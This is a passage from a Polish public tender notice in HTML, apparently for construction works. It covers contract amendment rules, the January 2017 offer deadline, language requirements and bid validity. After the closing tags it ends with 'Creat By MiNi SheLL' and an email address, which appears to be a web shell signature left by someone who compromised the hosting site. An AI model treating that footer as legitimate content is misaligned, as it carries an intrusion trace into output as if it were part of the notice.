4) Jeżeli z tytułu wykonanych robót zamiennych wykonawca poniósł koszty wykraczające poza kalkulację ceny wynikającą z oferty, uprawniony jest do otrzymania z tego tytułu dodatkowego wynagrodzenia wynikającego z zaakceptowanego przez Zamawiającego kosztorysu ofertowego. Zmiana ta musi być potwierdzona protokołem konieczności wraz z uzasadnieniem, podpisanym przez Inspektora Nadzoru i kierowników robót poszczególnych branż. 
5) Zamawiający w uzgodnieniu z Wykonawcą może ograniczyć zakres robót w stosunku do wykonywanego zakresu umowy, (roboty zaniechane), poprzez podpisanie stosownego aneksu do umowy, w przypadku zaistnienia okoliczności wynikających z technologii lub funkcjonalności przedmiotu umowy lub na skutek sytuacji niemożliwych do przewidzenia w momencie podpisywania umowy, 
6) Osób przewidzianych do realizacji zamówienia przez Strony, w szczególności w przypadku nieprzewidzianych zdarzeń losowych min. takich jak: śmierć, choroba, ustanie stosunku pracy, niewywiązywania się z obowiązków wynikających z umowy, a także w przypadku wystąpienia innych ważnych przyczyn, pod warunkiem, że osoby zaproponowane będą posiadały kwalifikacje i uprawnienia zgodne z wymogiem SIWZ, 
7) Podwykonawcy, jeżeli podwykonawca nie został zaakceptowany przez Zamawiającego, nie wykonuje prac z należytą starannością, uległ likwidacji, doszło do rozwiązania umowy łączącej go z Wykonawcą, 
8) Określony w umowie zakres i wartość wykonywanych robót przez podwykonawców pod warunkiem, że zapewni to prawidłową realizację umowy. 
3. Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego oraz przez Wykonawcę. 
4. Zamawiający jest uprawniony do żądania zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy w związku ze zmianami zawartej przez Zamawiającego umowy o dofinansowanie projektu lub zmianami wytycznych dotyczących realizacji projektu. 
5. Warunkiem dokonania zmian w umowie jest złożenie wniosku przez stronę inicjującą zamianę zawierającego: opis propozycji zmian, uzasadnienie zmian, opis wypływu zmiany na termin wykonania umowy. 
6. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/01/2017, godzina: 11:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Wnioski o dopuszczenie do udziału w postępowaniu oraz oferty składa się w języku polskim<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com